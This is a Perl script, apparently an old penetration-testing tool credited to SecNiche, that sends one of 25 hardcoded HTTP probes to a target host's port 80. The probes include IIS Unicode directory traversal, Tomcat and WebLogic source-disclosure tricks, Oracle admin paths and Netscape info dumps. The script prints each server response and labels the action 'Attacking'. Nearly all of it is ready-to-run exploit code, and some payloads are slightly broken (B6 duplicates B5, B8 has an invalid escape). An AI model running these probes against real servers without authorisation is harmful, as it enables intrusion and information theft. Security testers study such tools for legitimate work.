# 80Penetrate.pl : Web Vulnerability Check for Level 1 Testing # Triosec , SecNiche.org print STDOUT "\n" ; print STDOUT "80Penetrate By zeroknock [at] secniche\.Org\n"; print STDOUT "http://triosec.org\n"; print"\n"; print STDOUT "[*] Web Vulnerability Checker for Level 1 Testing.\n"; $ARGC=@ARGV; if ( not $ARGV[1] ) { print qq~ [*] Usage:- Penetrate80.pl Target Server [Apache TomCat] Request Type A1 = GET /file.js%70 HTTP/1.0 Request Type A2 = GET /file%252ejsp HTTP/1.0 [BEA WebLogin Case Sensitive File Extension] Request Type A3 = GET /file.JSP /HTTP/1.0 Request Type A4 = GET /file.Jsp /HTTP/1.0 Request Type A5 = GET /file.jsP /HTTP/1.0 [Oracle Internet Application Server] Request Type A6 = GET /WebDB/admin_/ HTTP/1.0 [Oracle 9i Application Server mod_plsql] Request Type A7 = GET /pls/sample/admin_/help/..%255c/// HTTP/1.0 [Netscape Enterprise Server /?wp-cs-dump ] Request Type A8 = GET /?wp-cs-dump HTTP/1.0 Request Type A9 = GET /?wp-ver-info HTTP/1.0 Request Type B1 = GET /?wp-html-rend HTTP/1.0 [Netscape Enterprise Server INDEX] Request Type B2 = INDEX / HTTP/1.0 [BEA Web Logic] Request Type B3 = GET /%00/ HTTP/1.0 Request Type B4 = GET /%2e/ HTTP/1.0 Request Type B5 = GET /%2f/ HTTP/1.0 Request Type B6 = GET /%5c/ HTTP/1.0 [Microsoft IIS Unicode] Request Type B7 = GET /scripts/..%c1%1c../*.* HTTP/1.0 Request Type B8 = GET /scripts/..%c0%9v../*.* HTTP/1.0 Request Type B9 = GET /scripts/..%c0%af../*.* HTTP/1.0 [Apache Webserver] Request Type C1 = GET /.DS_Store HTTP/1.0 Request Type C2 = GET /.FBCIndex HTTP/1.0 Request Type C3 = GET /?M=A HTTP/1.0 Request Type C4 = GET /?S=D HTTP/1.0 Request Type C5 = GET /cgi-bin/test-cgi?/* HTTP/1.0 Request Type C6 = GET //WEB-INF/ HTTP/1.0 Request Type C7 = GET /%3f.jsp HTTP/1.0 ------------------------------------------- Example:- 80Penetrate.pl 203.197.219.34 A1 ~; exit; } print"\n\n"; use IO::Socket; $host = $ARGV[0]; $req_type = $ARGV[1]; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "http(80)", ); unless ($remote) { die "[*]Cannot Connect Daemon!\n" } $remote->autoflush(1); if ($req_type =~ "A1" ) { print "\n[*] Attacking With Request Code [A1]\n"; print "=====================================\n"; print $remote "GET /file.js%70 HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A2" ) { print "\n[*] Attacking With Request Code [A2]\n"; print "=====================================\n"; print $remote "GET /file%252ejsp HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A3" ) { print "\n[*] Attacking With Request Code [A3]\n"; print "=====================================\n"; print $remote "GET /file.JSP /HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A4" ) { print "\n[*] Attacking With Request Code [A4]\n"; print "=====================================\n"; print $remote "GET /file.Jsp /HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A5" ) { print "\n[*] Attacking With Request Code [A5]\n"; print "=====================================\n"; print $remote "GET /file.jsP /HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A6" ) { print "\n[*] Attacking With Request Code [A6]\n"; print "=====================================\n"; print $remote "GET /WebDB/admin_/ HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A7" ) { print "\n[*] Attacking With Request Code [A7]\n"; print "=====================================\n"; print $remote "GET /pls/sample/admin_/help/..%255c//// HTTP/1.0\n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A8" ) { print "\n[*] Attacking With Request Code [A8]\n"; print "=====================================\n"; print $remote "GET /?wp-cs-dump HTTP/1.0\n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "A9" ) { print "\n[*] Attacking With Request Code [A9]\n"; print "=====================================\n"; print $remote "GET /?wp-ver-info HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B1" ) { print "\n[*] Attacking With Request Code [B1]\n"; print "=====================================\n"; print $remote "GET /?wp-html-rend HTTP/1.0\n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B2" ) { print "\n[*] Attacking With Request Code [B2]\n"; print "=====================================\n"; print $remote "INDEX / HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B3" ) { print "\n[*] Attacking With Request Code [B3]\n"; print "=====================================\n"; print $remote "GET /%00/ HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B4" ) { print "\n[*] Attacking With Request Code [B4]\n"; print "=====================================\n"; print $remote "GET /%2e/ HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B5" ) { print "\n[*] Attacking With Request Code [B5]\n"; print "=====================================\n"; print $remote "GET /%2f/ HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B6" ) { print "\n[*] Attacking With Request Code [B6]\n"; print "=====================================\n"; print $remote "GET /%2f/ HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B7" ) { print "\n[*] Attacking With Request Code [B7]\n"; print "=====================================\n"; print $remote "GET /scripts/..%c1%1c../*.* HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B8" ) { print "\n[*] Attacking With Request Code [B8]\n"; print "=====================================\n"; print $remote "GET /scripts/..%c0%9v../*.* HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "B9" ) { print "\n[*] Attacking With Request Code [B9]\n"; print "=====================================\n"; print $remote " GET /scripts/..%c0%af../*.* HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C1" ) { print "\n[*] Attacking With Request Code [C1]\n"; print "=====================================\n"; print $remote " GET /.DS_Store HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C2" ) { print "\n[*] Attacking With Request Code [C2]\n"; print "=====================================\n"; print $remote " GET /.FBCIndex HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C3" ) { print "\n[*] Attacking With Request Code [C3]\n"; print "=====================================\n"; print $remote " GET /?M=A HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C4" ) { print "\n[*] Attacking With Request Code [C4]\n"; print "=====================================\n"; print $remote " GET /?S=D HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C5" ) { print "\n[*] Attacking With Request Code [C5]\n"; print "=====================================\n"; print $remote " GET /cgi-bin/test-cgi?/* HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C6" ) { print "\n[*] Attacking With Request Code [C6]\n"; print "=====================================\n"; print $remote " GET //WEB-INF/ HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; } if ($req_type =~ "C7" ) { print "\n[*] Attacking With Request Code [C7]\n"; print "=====================================\n"; print $remote " GET /%3f.jsp HTTP/1.0 \n\n"; while ( <$remote> ) { print } close $remote; }